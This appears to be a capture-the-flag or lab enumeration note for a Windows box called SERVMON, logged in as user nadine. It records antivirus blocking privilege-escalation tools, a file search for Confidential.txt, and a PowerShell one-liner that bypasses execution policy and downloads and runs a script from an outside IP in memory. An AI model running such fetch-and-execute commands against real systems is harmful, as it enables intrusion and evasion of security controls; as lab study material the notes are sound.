4 box enum nadine

# some AV is blocking to write file, download files
# remotely running PowerUp.ps1 via IEX is failing.
| This script contains malicious content and has been blocked by your antivirus software.

nadine@SERVMON C:\inetpub>dir
 Directory of C:\inetpub

08/04/2020  23:21    <DIR>          .
08/04/2020  23:21    <DIR>          ..
08/04/2020  23:09    <DIR>          ftproot
14/01/2020  20:01    <DIR>          logs

# nothing in ftproot
# looking for the same files as in ftp
nadine@SERVMON C:\>dir /b /s "Confidential.txt"
C:\Shared\Users\Nadine\Confidential.txt

# we can write files here.
# certutil.exe is failing; PS wget works

# PowerUp is failing due to AV checks
# win.exe is failing to execute.
# need to manual enum

# net user <>
| both nadine and nathan are just *USERS
| Administrator is in 'administrators' localgroup

# running Get-RemoteProgram.ps1
nadine@SERVMON C:\Shared\Users\Nadine>powershell -exec bypass IEX(New-Object Net.WebClient).downloadString('http://10.10.16.7/Get-RemoteProgram
.ps1')

ComputerName ProgramName
------------ -----------
SERVMON      VMware Tools
SERVMON      NSClient++ (x64)
SERVMON      Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
SERVMON      Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.27.29016
SERVMON      Microsoft Visual C++ 2019 X64 Additional Runtime - 14.27.29016
SERVMON      NVMS-1000
SERVMON      Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319
SERVMON      Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.27.29016
SERVMON      Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.27.29016
SERVMON      Microsoft Visual C++ 2019 X86 Additional Runtime - 14.27.29016
SERVMON      Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
SERVMON      NVMS-1000
SERVMON      Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.27.29016
SERVMON      Microsoft OneDrive

Last updated